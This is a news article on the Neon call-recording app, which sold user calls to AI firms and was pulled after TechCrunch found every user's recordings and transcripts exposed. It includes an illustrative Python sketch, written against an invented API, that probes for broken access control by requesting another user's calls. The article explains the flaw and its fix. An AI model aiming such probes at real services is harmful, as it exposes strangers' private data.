- The Neon app offered cash for recordings of your phone calls
- These were sold to AI companies to train their models
- It has been taken offline after a major security flaw exposed users’ recordings
How do you like the sound of an app that records your phone calls and sells those private conversations to artificial intelligence (AI) companies? Sure, you might get paid a little in return, but is it worth the huge privacy risk?
It turns out that the answer is a resounding ‘no’, because the viral app – called Neon Mobile – has been taken offline after it emerged that anyone could access the phone numbers, transcripts and actual call recordings of any other user of the service. Worst of all, the data breach could be carried out with the most trivial tools and the barest modicum of effort, suggesting that the app’s security measures were woefully inadequate.
The vulnerability was discovered and reported by TechCrunch. The news site explained that it created a new account to test Neon’s functionality, then used a network analysis tool called Burp Suite to inspect the app’s network traffic. While Neon’s own interface showed the TechCrunch journalists a list of their calls and how much money each one had earned, Burp Suite revealed far more information.
That included text transcripts of each call and web links to the recordings. This information could apparently be accessed by anyone with the right link, meaning the files were essentially open to anyone and everyone.
But the reported vulnerability was not limited to your own data – you could apparently retrieve the same details for any other user. TechCrunch found that Neon’s servers could produce a list of the most recent calls made by all of its users, along with publicly accessible links to the corresponding recordings and transcripts.
Metadata for each call was exposed too, including phone numbers, call dates, durations and more. In other words, it was an almost total free-for-all of users’ private recordings and conversations.
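Based on TechCrunch’s description, the flaw fits a well-known broken-access-control pattern: the backend hands back data for whichever user it is asked about, and recordings live at links that work for anyone who has them. The short Python sketch below is purely illustrative – the domain, endpoint, parameters and response fields are invented for this example and are not Neon’s actual API – but it shows how little effort it takes to probe such a gap once the app’s traffic has been inspected with a proxy like Burp Suite.

```python
# Illustrative only: a hypothetical, simplified reconstruction of the kind of
# broken access control described in the article. The URL, parameters and
# JSON fields below are invented for this sketch and are NOT Neon's real API.
import requests

API_BASE = "https://api.example-call-app.com"   # hypothetical backend
MY_TOKEN = "token-issued-to-my-own-account"     # placeholder credential


def fetch_recent_calls(user_id: str) -> list[dict]:
    """Ask the backend for a user's recent calls.

    In a correctly secured API, the server would only return calls belonging
    to the account that owns MY_TOKEN. In the flawed pattern described in the
    article, it happily returns data for *any* user_id it is given.
    """
    resp = requests.get(
        f"{API_BASE}/v1/calls",
        params={"user_id": user_id},                  # attacker-chosen value
        headers={"Authorization": f"Bearer {MY_TOKEN}"},
        timeout=10,
    )
    resp.raise_for_status()
    return resp.json().get("calls", [])


if __name__ == "__main__":
    # Probe an ID that is not our own. If this returns phone numbers,
    # transcripts and public recording links, access control is effectively absent.
    for call in fetch_recent_calls("some-other-user-id"):
        print(call.get("phone_number"), call.get("duration_seconds"),
              call.get("transcript_url"), call.get("recording_url"))
```

The remedy for this class of bug is equally simple to describe: the server should derive the account from the authenticated token rather than trusting a client-supplied user ID, and recording links should require authorisation instead of being publicly reachable.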
A privacy disaster
TechCrunch warned Alex Kiam, Neon’s founder, about the flaw. Kiam “temporarily” took the app down and emailed Neon’s users. However, Kiam’s mass message did not mention the security flaw or the fact that users’ calls could be downloaded by anyone with the barest level of technical know-how. Instead, it simply said that the developer “took the app down to add extra layers of security.”
Even before this security breach came to light, the concept behind Neon was questionable. In short, the app was a potential privacy nightmare. There was no cast-iron guarantee that your recorded calls would be handled safely or stored anonymously, and feeding them into a black-box AI algorithm could have all kinds of unexpected consequences and data risks.
As TechCrunch’s investigation showed, metadata (including phone numbers) was stored alongside the call recordings, which means it would be trivial to personally identify the callers and the private matters they discussed.
In addition, Neon did not appear to warn the other participants on a call that their words were being recorded, raising the question of whether anyone had actually given consent.
Such a system was also ripe for abuse – something TechCrunch apparently confirmed. The outlet said it discovered long calls that appeared to capture real-world conversations with other people, seemingly recorded to generate money through the app. It is doubtful that the people being secretly recorded knew it was happening, which opens up yet another privacy can of worms.
There is no word on when – or if – Neon will come back online, but Apple and Google are likely to be taking a keen interest in the case. Whether they allow it back into their app stores remains to be seen, but the concept doesn’t sit well with the pro-privacy messaging both companies like to push.